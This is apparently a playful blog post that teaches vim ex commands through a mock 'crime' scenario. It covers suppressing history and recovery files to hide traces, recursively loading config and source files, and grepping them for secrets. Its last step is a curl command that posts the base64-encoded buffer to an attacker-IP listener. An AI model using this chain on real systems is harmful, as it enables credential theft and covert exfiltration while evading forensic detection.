aka, how to use your editor for crimes! i don’t expect to ever do any crimes but i do like picking up new vim tricks…
ex commands are what you use to do operations like writing, quitting,
find and replacing, manipulating buffers and external shell commands.
they start with a colon: :w, :%s// and so on.
:r!<external command>.
if you’re doing a crime, start vim like vim -n -i NONE
so that histories aren’t written to disk and recovery files aren’t used.
hides your traces!
:args is an ex command which loads all files which match
a glob: :args **/*.{env,json,yaml,php,py} **/*
is a recursive globbing, and the stuff in braces is a for each type
construct. nifty! this adds the files to the argument list (by default
it loads them into buffers)
:vimgrep lets you grep a regex against some stuff, and
puts the results (matching lines) in the quickfist list.
:vimgrep <pattern> ## tells it to check the whole
argument list.
:copen opens the quickfist list. always nifty, always
easy to forget! :cnext, :cprev to navigate
thru it.
quickfix is readonly, so to put stuff into a new buffer we can chain
ex commands: :%y a|q|new|0put a|$d which… let’s see. yanks
the whole buffer into regester a, then closes the quickfist window, then
new creates a new empty buffer, 0put a puts
the contents of a register at line 0, and $d deletes the
trailing last line.
doing all this in vim makes it harder for people to notice!
use a substitution to get just the secrets, if you like.
:sort u sorts lines and u removes duplicates,
which is different to :%!sort -u which calls the external
sort command (and leaves a log).
to exfiltrate you can write to a file to retrieve later, or you can
use curl put your secrets in a payload you POST to a listening http
port. base 64 encode it first for extra stealth!
:%w !curl -X POST --data-binary @- http://attacker-IP:8000/exfil -s
writes the buffer to an external command, @ is placeholder for stdin, -s
is no progress output. pipe through base64 with !base64
external command. probably very difficiult to detect!
wow, vim is so nifty!! B)